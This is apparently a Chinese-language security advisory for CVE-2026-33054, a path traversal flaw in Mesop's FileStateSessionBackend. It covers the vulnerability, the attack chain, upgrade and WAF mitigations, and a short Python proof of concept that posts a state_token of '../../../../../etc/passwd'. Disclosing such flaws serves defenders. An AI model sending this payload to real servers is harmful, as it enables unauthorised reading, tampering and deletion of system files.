CVE-2026-33054 CVSS 10.0 严重

CVE-2026-33054 Mesop路径遍历漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33054

漏洞类型

路径遍历

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Mesop

漏洞概述

Mesop UI框架 v1.2.2及以下版本存在严重的路径遍历漏洞。攻击者可通过UI流负载提供不受信任的state_token，利用FileStateSessionBackend后端访问服务器磁盘上任意文件。成功利用可能导致应用拒绝服务或敏感配置被任意篡改、删除，造成严重安全风险。

技术细节

该漏洞的根本原因是Mesop框架在处理基于文件的会话状态时，缺乏对用户输入的`state_token`进行严格的路径规范化与校验。攻击者可以通过网络发送精心构造的UI流负载，其中包含恶意的路径遍历序列（如'../'）。当后端尝试利用此Token定位文件时，攻击者可成功绕过目录限制，访问服务器文件系统上的任意文件。利用该漏洞，攻击者不仅能读取敏感信息导致信息泄露，还能通过写入操作覆盖或删除系统资源。特别是当读取非Msgpack格式的文件时，会引发应用崩溃循环，造成拒绝服务。鉴于攻击无需认证且无交互要求，该漏洞极易被大规模利用。

攻击链分析

STEP 1

侦察

攻击者识别出使用Mesop框架且版本低于1.2.3的目标应用程序。

STEP 2

构造攻击载荷

攻击者构造包含恶意路径遍历序列（如../）的state_token，并将其封装在UI流负载中。

STEP 3

发送请求

攻击者通过网络向目标应用的后端接口发送特制的恶意请求，无需认证和用户交互。

STEP 4

执行攻击

后端解析state_token并访问指定路径下的文件，导致文件内容泄露、文件被篡改删除或服务崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-33054
# This script demonstrates sending a malicious state_token
import requests

def exploit(target_url):
    # Payload attempting to traverse directories
    payload = {
        "state_token": "../../../../../etc/passwd"
    }
    
    headers = {
        "Content-Type": "application/json"
    }
    
    try:
        r = requests.post(target_url, json=payload, headers=headers, timeout=5)
        if r.status_code == 200:
            print("[+] Request sent successfully, check server response for file content or errors.")
        else:
            print(f"[-] Server returned status code: {r.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

# Usage: exploit('http://localhost:8080/stream')

影响范围

Mesop <= 1.2.2

防御指南

临时缓解措施

建议立即升级至Mesop v1.2.3或更高版本。若无法立即升级，应实施网络隔离，限制对内部API的访问，并部署Web应用防火墙（WAF）规则以检测和阻断包含路径遍历字符（如 '../'）的恶意请求。同时，评估禁用FileStateSessionBackend的可行性。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表